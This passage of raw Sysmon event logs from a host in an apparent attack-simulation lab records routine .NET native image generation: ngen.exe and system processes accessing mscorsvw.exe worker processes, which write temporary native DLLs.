:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:18.295{59A5CD1D-919F-6005-E102-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12f8-0\System.Workflow.ComponentModel.dll2021-01-18 13:48:18.295 10341000x80000000000000007125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.466{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A4-6005-E502-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.451{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91A4-6005-E502-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:20.451{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A4-6005-E502-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.373{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A4-6005-E402-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.357{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A4-6005-E402-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007120Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:20.357{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A4-6005-E402-00000000A301}4548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007119Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:20.248{59A5CD1D-91A2-6005-E302-00000000A301}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\35c-0\System.Workflow.Runtime.dll2021-01-18 13:48:20.248 10341000x80000000000000007143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.841{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A5-6005-EA02-00000000A301}1560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.826{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A5-6005-EA02-00000000A301}1560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:21.826{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A5-6005-EA02-00000000A301}1560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:21.779{59A5CD1D-91A5-6005-E902-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ac0-0\System.Xml.Serialization.dll2021-01-18 13:48:21.779 10341000x80000000000000007139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:21.763{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A5-6005-E902-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.748{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A5-6005-E902-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:21.748{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A5-6005-E902-00000000A301}2752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.716{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A5-6005-E802-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.701{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A5-6005-E802-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.701{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A5-6005-E802-00000000A301}748C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84
d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:21.654{59A5CD1D-91A5-6005-E702-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\88c-0\System.Xaml.Hosting.dll2021-01-18 13:48:21.654 10341000x80000000000000007132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.576{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A5-6005-E702-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.560{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A5-6005-E702-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:48:21.560{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A5-6005-E702-00000000A301}2188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.513{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A5-6005-E602-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000007128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.513{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A5-6005-E602-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:21.513{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A5-6005-E602-00000000A301}4112C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+
84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:21.420{59A5CD1D-91A4-6005-E502-00000000A301}3168C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c60-0\System.WorkflowServices.dll2021-01-18 13:48:21.420 10341000x80000000000000007156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.591{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A6-6005-EE02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:22.576{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91A6-6005-EE02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
